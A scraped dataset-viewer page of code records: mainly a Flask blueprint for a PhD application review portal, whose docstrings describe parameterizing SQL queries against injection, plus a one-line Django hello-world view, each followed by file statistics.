        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/send_phd1/<application>')
@login_required
def send_phd1(application):
    """First reader (Tutor1) submits a file: stamps ft1, computes tt1,
    and marks Submission1 Done / Validation Pending.

    Fixes: SQL was built by string concatenation from the URL path
    ``application`` (SQL injection) — now parameterized; the sqlite
    connection was never closed.
    """
    if current_user.is_active == True:
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        rows=c.execute('''SELECT * FROM phd''').fetchall()
        # Reversed rows: p[0]=Application, p[3]=Tutor1.
        rows=[list(tup[::-1]) for tup in rows]
        found=0
        for p in rows:
            if p[0]==application:
                if p[3] == current_user.username:
                    c.execute("update phd set ft1 = ? WHERE Application = ?",(datetime.now(),application))
                    conn.commit()
                    filltime1(application)
                    # security fix: parameterized — application is untrusted.
                    c.execute("update phd set Submission1 = 'Done' WHERE Application = ?",(application,))
                    conn.commit()
                    c.execute("update phd set Validation = 'Pending' WHERE Application = ?",(application,))
                    conn.commit()
                    c.execute("update phd set Reject_Reason = 'None' WHERE Application = ?",(application,))
                    conn.commit()
                    found=1
                    flash('File submitted successfully ','success')
                else:
                    # Submitting someone else's file is logged as a violation.
                    report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
                    fillReport(report,current_user.username,datetime.now())
                    found=1
                    flash('This incident will be reported ','danger')
                break
        if found==0:
            flash('No such file exist','danger')
        conn.close()  # fix: connection was previously leaked
        return redirect(url_for('phds.phd'))
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/send_phd2/<application>')
@login_required
def send_phd2(application):
    """Second reader (Tutor2) submits a file: stamps ft2, computes tt2,
    and marks Submission2 Done / Validation Pending.

    Fixes: SQL injection via the URL path ``application`` (now
    parameterized); leaked sqlite connection; adds the missing
    "No such file exist" message for consistency with send_phd1.
    """
    if current_user.is_active == True:
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        rows=c.execute('''SELECT * FROM phd''').fetchall()
        # Reversed rows: p[0]=Application, p[2]=Tutor2.
        rows=[list(tup[::-1]) for tup in rows]
        found=0
        for p in rows:
            if p[0]==application:
                if p[2] == current_user.username:
                    c.execute("update phd set ft2 = ? WHERE Application = ?",(datetime.now(),application))
                    conn.commit()
                    filltime2(application)
                    # security fix: parameterized — application is untrusted.
                    c.execute("update phd set Submission2 = 'Done' WHERE Application = ?",(application,))
                    conn.commit()
                    c.execute("update phd set Validation = 'Pending' WHERE Application = ?",(application,))
                    conn.commit()
                    c.execute("update phd set Reject_Reason = 'None' WHERE Application = ?",(application,))
                    conn.commit()
                    found=1
                    flash('File submitted successfully ','success')
                else:
                    report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
                    fillReport(report,current_user.username,datetime.now())
                    found=1
                    flash('This incident will be reported ','danger')
                break
        if found==0:
            # consistency fix: send_phd1 reported this case; send_phd2 did not.
            flash('No such file exist','danger')
        conn.close()  # fix: connection was previously leaked
        return redirect(url_for('phds.phd'))
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/verify_phd/<application>')
@login_required
def verify_phd(application):
    """Admin/manager marks a file's Validation as Done, warning if it was
    never actually submitted.

    Fixes: SQL injection via the URL path ``application`` (now
    parameterized); leaked sqlite connection.
    """
    if current_user.is_active == True:
        if current_user.is_admin==True or current_user.is_manager == True:
            conn = sqlite3.connect('portal/site.db')
            c = conn.cursor()
            rows=c.execute('''SELECT * FROM phd''').fetchall()
            rows=[list(tup[::-1]) for tup in rows]
            for p in rows:
                if p[0] == application:
                    # security fix: parameterized — application is untrusted.
                    c.execute("update phd set Validation = 'Done' WHERE Application = ?",(application,))
                    conn.commit()
                    # p[4] is Submission1 after row reversal.
                    if p[4] == 'Done':
                        flash('File verified successfully','success')
                    else:
                        flash("You have a verified non submitted file",'info')
                    break
            conn.close()  # fix: connection was previously leaked
            return redirect(url_for('dashboard'))
        else:
            report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
            fillReport(report,current_user.username,datetime.now())
            flash('This incident will be reported','danger')
            return render_template('error.html',error=403)
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/comment_phd1/<application>', methods=['GET', 'POST'])
@login_required
def comment_phd1(application):
    """Tutor1 or Tutor2 saves round-1 comment text (Comment1) for a file.

    Fixes: SQL injection — both ``request.form['comment']`` and the URL
    path ``application`` were concatenated into the statement; now
    parameterized. Also closes the previously leaked connection.
    """
    if current_user.is_active == True:
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        rows=c.execute('''SELECT * FROM phd''').fetchall()
        # Reversed rows: p[0]=Application, p[2]=Tutor2, p[3]=Tutor1.
        rows=[list(tup[::-1]) for tup in rows]
        for p in rows:
            if p[0]==application:
                if p[3] == current_user.username or p[2] == current_user.username:
                    # security fix: parameterized — form text is untrusted.
                    c.execute("update phd set Comment1 = ? WHERE Application = ?",(request.form['comment'],application))
                    conn.commit()
                    flash('Comment added successfully', 'info')
                else:
                    report=str(current_user.username)+' tried to add comment an unassigned file = '+str(application)
                    fillReport(report,current_user.username,datetime.now())
                    flash('This incident will be reported ','danger')
                break
        conn.close()  # fix: connection was previously leaked
        return redirect(url_for('phds.ta_lab_phd',application=application))
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/comment_phd2/<application>', methods=['GET', 'POST'])
@login_required
def comment_phd2(application):
    """Tutor1 or Tutor2 saves round-2 comment text (Comment2) for a file.

    Fixes: SQL injection via ``request.form['comment']`` and the URL path
    ``application`` (now parameterized); leaked sqlite connection.
    """
    if current_user.is_active == True:
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        rows=c.execute('''SELECT * FROM phd''').fetchall()
        # Reversed rows: p[0]=Application, p[2]=Tutor2, p[3]=Tutor1.
        rows=[list(tup[::-1]) for tup in rows]
        for p in rows:
            if p[0]==application:
                if p[3] == current_user.username or p[2] == current_user.username:
                    # security fix: parameterized — form text is untrusted.
                    c.execute("update phd set Comment2 = ? WHERE Application = ?",(request.form['comment'],application))
                    conn.commit()
                    flash('Comment added successfully', 'info')
                else:
                    report=str(current_user.username)+' tried to add comment an unassigned file = '+str(application)
                    fillReport(report,current_user.username,datetime.now())
                    flash('This incident will be reported ','danger')
                break
        conn.close()  # fix: connection was previously leaked
        return redirect(url_for('phds.ta_lab_phd',application=application))
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
def fillLogs(usr,pos,app_no,col,old_val,new_val,dt):
    """Append one audit row to system_logs recording an admin/manager edit
    (who, role, which application, which column, old and new value, when)."""
    connection = sqlite3.connect('portal/site.db')
    cursor = connection.cursor()
    cursor.execute(
        "INSERT INTO system_logs (User,pos,Application_number,column_name,course,old_val,new_val,Date) VALUES (?,?,?,?,?,?,?,?) ",
        (usr, pos, app_no, col, 'phd', old_val, new_val, dt),
    )
    connection.commit()
    connection.close()
    return
@phds.route('/edit_phd/<application>', methods=['GET', 'POST'])
@login_required
def edit_phd(application):
    """Admin/manager edits one cell of a phd row and audit-logs the change.

    Fixes: the column name came straight from ``request.form['column_val']``
    and was interpolated into SQL (identifier injection) — it is now
    validated against the table's real columns; the lookup query is
    parameterized; the unauthorized branch previously fell through and
    returned None; the connection is now closed.
    """
    if current_user.is_active == True:
        if current_user.is_manager==True or current_user.is_admin==True:
            conn = sqlite3.connect('portal/site.db')
            c = conn.cursor()
            # security fix: only accept a column that actually exists —
            # identifiers cannot be bound as SQL parameters.
            table_info=c.execute('''PRAGMA table_info('phd')''').fetchall()
            valid_columns={info[1] for info in table_info}
            var=request.form['column_val']
            if var not in valid_columns:
                conn.close()
                abort(400)
            new_val = request.form[var]
            db_df=pd.read_sql_query('SELECT "'+var+'" FROM phd WHERE application = ?', conn, params=(application,))
            old_val=db_df[var][0]
            c.execute('''update phd set "'''+var+'''" = ? WHERE Application = ?''',(new_val,application))
            conn.commit()
            conn.close()  # fix: connection was previously leaked
            if current_user.is_admin==True:
                pos='Admin'
            else:
                pos='Manager'
            fillLogs(current_user.username,pos,application,var,old_val,new_val,datetime.now())
            flash('Updated '+var,'success')
            return redirect(url_for('phds.lab_phd',application=application))
        else:
            report=str(current_user.username)+' tried to submit an unassigned file = '+str(application)
            fillReport(report,current_user.username,datetime.now())
            flash('This incident will be reported ','danger')
            # fix: this branch previously returned None (a 500).
            return render_template('error.html',error=403)
    else:
        return redirect(url_for('logout'))
@phds.route('/reject_phd/<application>', methods=['GET', 'POST'])
@login_required
def reject_phd(application):
    """Admin/manager rejects a submission: stores the reason, resets both
    Submission flags to Pending and marks Validation Rejected.

    Fixes: SQL injection via ``request.form['msg']`` and the URL path
    ``application`` (now parameterized); leaked sqlite connection; the
    active-but-unauthorized path previously returned None.
    """
    if current_user.is_active == True:
        if current_user.is_admin == True or current_user.is_manager==True:
            conn = sqlite3.connect('portal/site.db')
            c = conn.cursor()
            rows=c.execute('''SELECT * FROM phd''').fetchall()
            rows=[list(tup[::-1]) for tup in rows]
            for p in rows:
                if p[0]==application:
                    # security fix: parameterized — form text is untrusted.
                    c.execute("update phd set Reject_Reason = ? WHERE Application = ?",(request.form['msg'],application))
                    conn.commit()
                    c.execute("update phd set Submission1 = 'Pending' WHERE Application = ?",(application,))
                    conn.commit()
                    c.execute("update phd set Submission2 = 'Pending' WHERE Application = ?",(application,))
                    conn.commit()
                    c.execute("update phd set Validation = 'Rejected' WHERE Application = ?",(application,))
                    conn.commit()
                    flash('TA notified successfully', 'info')
                    break
            conn.close()  # fix: connection was previously leaked
            return redirect(url_for('dashboard'))
        # fix: an active non-admin/non-manager user previously got no
        # response at all; behave like the sibling routes.
        return render_template('error.html',error=403)
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/change_phd1/<application>', methods=['GET', 'POST'])
@login_required
def change_phd1(application):
    """Admin/manager reassigns Tutor1 for one file.

    Fixes: SQL injection via ``request.form['tutor1']`` and the URL path
    ``application`` (now parameterized); leaked sqlite connection.
    """
    if current_user.is_active == True:
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        rows=c.execute('''SELECT * FROM phd''').fetchall()
        rows=[list(tup[::-1]) for tup in rows]
        for p in rows:
            if p[0]==application:
                if current_user.is_admin==True or current_user.is_manager==True:
                    # security fix: parameterized — form value is untrusted.
                    c.execute("update phd set Tutor1 = ? WHERE Application = ?",(request.form['tutor1'],application))
                    conn.commit()
                    flash('Tutor changed successfully', 'success')
                else:
                    report=str(current_user.username)+' tried to reasign Tutor = '+str(application)
                    fillReport(report,current_user.username,datetime.now())
                    flash('This incident will be reported ','danger')
                break
        conn.close()  # fix: connection was previously leaked
        return redirect(url_for('phds.phd'))
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
@phds.route('/change_phd2/<application>', methods=['GET', 'POST'])
@login_required
def change_phd2(application):
    """Admin/manager reassigns Tutor2 for one file.

    Fixes: SQL injection via ``request.form['tutor2']`` and the URL path
    ``application`` (now parameterized); leaked sqlite connection.
    """
    if current_user.is_active == True:
        conn = sqlite3.connect('portal/site.db')
        c = conn.cursor()
        rows=c.execute('''SELECT * FROM phd''').fetchall()
        rows=[list(tup[::-1]) for tup in rows]
        for p in rows:
            if p[0]==application:
                if current_user.is_admin==True or current_user.is_manager==True:
                    # security fix: parameterized — form value is untrusted.
                    c.execute("update phd set Tutor2 = ? WHERE Application = ?",(request.form['tutor2'],application))
                    conn.commit()
                    flash('Tutor changed successfully', 'success')
                else:
                    report=str(current_user.username)+' tried to reasign Tutor = '+str(application)
                    fillReport(report,current_user.username,datetime.now())
                    flash('This incident will be reported ','danger')
                break
        conn.close()  # fix: connection was previously leaked
        return redirect(url_for('phds.phd'))
    else:
        flash('Your account has been deactivated by administrator','danger')
        return redirect(url_for('logout'))
def fillReport(msg,usr,dt):
    """Record a security-violation entry (message, offending user, time)."""
    connection = sqlite3.connect('portal/site.db')
    # The connection context manager commits on success.
    with connection:
        connection.execute("INSERT INTO violations (Report,User,Date) VALUES (?,?,?) ",(msg,usr,dt))
    connection.close()
    return
def filltime1(application):
    """Store in tt1 the elapsed seconds between st1 (file first opened by
    Tutor1) and ft1 (file submitted) for the given application.

    Fixes: the sqlite connection was never closed; the scan now breaks
    after the match (Application mirrors the table's unique primary key).
    NOTE(review): ``timedelta.seconds`` ignores whole days — preserved.
    """
    conn = sqlite3.connect('portal/site.db')
    c = conn.cursor()
    rows=c.execute('''SELECT * FROM phd''').fetchall()
    # Reversed rows: p[0]=Application, p[10]=st1, p[11]=ft1.
    rows=[list(tup[::-1]) for tup in rows]
    for p in rows:
        if p[0]==application:
            start=datetime.strptime(p[10],'%Y-%m-%d %H:%M:%S.%f')
            finish=datetime.strptime(p[11],'%Y-%m-%d %H:%M:%S.%f')
            diff=finish-start
            c.execute("update phd set tt1 = ? WHERE Application = ?",(diff.seconds,application))
            conn.commit()
            break
    conn.close()  # fix: connection was previously leaked
def filltime2(application):
    """Store in tt2 the elapsed seconds between st2 (file first opened in
    round 2) and ft2 (round-2 submission) for the given application.

    Fixes: the sqlite connection was never closed; the scan now breaks
    after the match (Application mirrors the table's unique primary key).
    NOTE(review): ``timedelta.seconds`` ignores whole days — preserved.
    """
    conn = sqlite3.connect('portal/site.db')
    c = conn.cursor()
    rows=c.execute('''SELECT * FROM phd''').fetchall()
    # Reversed rows: p[0]=Application, p[12]=st2, p[13]=ft2.
    rows=[list(tup[::-1]) for tup in rows]
    for p in rows:
        if p[0]==application:
            start=datetime.strptime(p[12],'%Y-%m-%d %H:%M:%S.%f')
            finish=datetime.strptime(p[13],'%Y-%m-%d %H:%M:%S.%f')
            diff=finish-start
            c.execute("update phd set tt2 = ? WHERE Application = ?",(diff.seconds,application))
            conn.commit()
            break
    conn.close()  # fix: connection was previously leaked
def phdData():
    """Create an empty phd table carrying only the portal's bookkeeping
    columns (no CSV data). The ALTER order below is significant: the rest
    of this module indexes reversed rows, so it must match phdcsv()."""
    conn = sqlite3.connect('portal/site.db')
    c = conn.cursor()
    c.execute('''
    CREATE TABLE phd (
    "Application Ref. No." INTEGER
    );''')
    # One ALTER per bookkeeping column, executed strictly in this order.
    bookkeeping_ddl = (
        '''ALTER TABLE phd ADD Comment2 TEXT''',
        '''ALTER TABLE phd ADD Submission2 TEXT DEFAULT "Pending" ''',
        '''ALTER TABLE phd ADD Reject_Reason TEXT''',
        '''ALTER TABLE phd ADD Validation TEXT DEFAULT "Pending" ''',
        '''ALTER TABLE phd ADD Comment1 TEXT''',
        '''ALTER TABLE phd ADD Submission1 TEXT DEFAULT "Pending" ''',
        '''ALTER TABLE phd ADD Tutor1 TEXT DEFAULT "Not Assigned" ''',
        '''ALTER TABLE phd ADD Tutor2 TEXT DEFAULT "Not Assigned" ''',
        '''ALTER TABLE phd ADD alloc_status TEXT DEFAULT "0" ''',
        '''ALTER TABLE phd ADD Application TEXT''',
    )
    for ddl in bookkeeping_ddl:
        c.execute(ddl)
    # Double quotes name the column: copy the reference number across.
    c.execute('''update phd set Application = "Application Ref. No."; ''')
    conn.commit()
    conn.close()
    return
@phds.route("/phd_submission")
@login_required
def phd_submission():
if current_user.is_active == True:
if current_user.is_admin == True or current_user.is_manager == True:
user=User.query.all()
post=Post.query.all()
image_file = url_for('static',filename='assets/img/faces/' + current_user.image_file)
conn = sqlite3.connect('portal/site.db')
c = conn.cursor()
phd_obj=c.execute('''SELECT * FROM phd''').fetchall()
phd_obj=[tup[::-1] for tup in phd_obj]
conn.close()
return render_template('phd_submissions.html', title='Submissions',
image_file=image_file,phd=phd_obj,
user=user,post=post)
else:
return render_template('error.html',error=404)
else:
flash('Your account has been deactivated by administrator','danger')
return redirect(url_for('logout'))
| 46.771176
| 183
| 0.48835
| 3,979
| 36,996
| 4.444081
| 0.071375
| 0.043432
| 0.031669
| 0.038455
| 0.835661
| 0.816377
| 0.770684
| 0.729967
| 0.701238
| 0.671153
| 0
| 0.015078
| 0.374338
| 36,996
| 790
| 184
| 46.83038
| 0.748866
| 0.015894
| 0
| 0.735007
| 0
| 0.001395
| 0.227148
| 0.013357
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04463
| false
| 0
| 0.013947
| 0
| 0.121339
| 0.002789
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ee354984037dfceff20591c21468f15318e2ab8
| 111
|
py
|
Python
|
django_fundamentals/views.py
|
ArRosid/django-fundamental
|
62d6d474bad6d7956c8b64d0a610daaefd36f561
|
[
"MIT"
] | null | null | null |
django_fundamentals/views.py
|
ArRosid/django-fundamental
|
62d6d474bad6d7956c8b64d0a610daaefd36f561
|
[
"MIT"
] | null | null | null |
django_fundamentals/views.py
|
ArRosid/django-fundamental
|
62d6d474bad6d7956c8b64d0a610daaefd36f561
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
def hello_world(request):
    """Minimal Django view returning a static HTML greeting."""
    body = '<h1>Hello World!</h1>'
    return HttpResponse(body)
| 27.75
| 47
| 0.765766
| 15
| 111
| 5.6
| 0.733333
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020202
| 0.108108
| 111
| 4
| 47
| 27.75
| 0.828283
| 0
| 0
| 0
| 0
| 0
| 0.1875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.